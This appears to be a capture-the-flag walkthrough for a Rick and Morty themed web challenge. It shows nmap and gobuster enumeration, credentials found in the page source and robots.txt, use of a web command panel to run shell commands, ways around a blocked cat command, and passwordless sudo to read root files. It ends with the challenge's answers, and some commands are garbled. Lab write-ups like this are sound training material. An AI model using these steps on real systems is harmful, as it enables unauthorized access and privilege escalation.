This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
The first step in any penetration testing engagement is thorough reconnaissance and enumeration.
sudo nmap-A -T 4 -v -oN scan_results
The Nmap scan reveals an Apache web server running on port 80.
Navigating to the website (http://
Checking the page source reveals a username comment:
Username found: R1ckRul3s
Using Gobuster to enumerate directories and files:
gobuster dir -u-x php,html,css,js,txt,pdf -w
This reveals hidden directories and files:
The robots.txt file contains:
Wubbalubbadubdub
This appears to be a password. Testing the portal.php login form with:
Successfully logs in and reveals a command panel - essentially a web shell for executing Linux commands.
The command panel allows execution of Linux commands. Testing with:
ls -la
Reveals files in current directory, including:
Note: The cat command is blocked, so alternative methods are needed.
To read the first ingredient file without using cat:
less Sup3rS3cretPickl3Ingred.txt
OR
tac Sup3rS3cretPickl3Ingred.txt
OR
grep . Sup3rS3cretPickl3Ingred.txt
First Ingredient: mr. meeseek hair
Reading the clue.txt file:
less clue.txt
Gives hint to "look around the file system". Checking /home directory:
ls /home
Reveals rick and ubuntu users. Exploring rick's directory:
ls /home/rick
Finds file named "second ingredients". Reading it:
tac "/home/rick/second ingredients"
Second Ingredient: 1 jerry tear
Current user is www-data. Checking sudo privileges:
sudo -l
Reveals www-data can run any command as root without a password! Listing root directory:
sudo ls /root
Finds 3rd.txt. Reading the file:
sudo less /root/3rd.txt
Third Ingredient: fleeb juice
Answer: mr. meeseek hair
Answer: 1 jerry tear
Answer: fleeb juice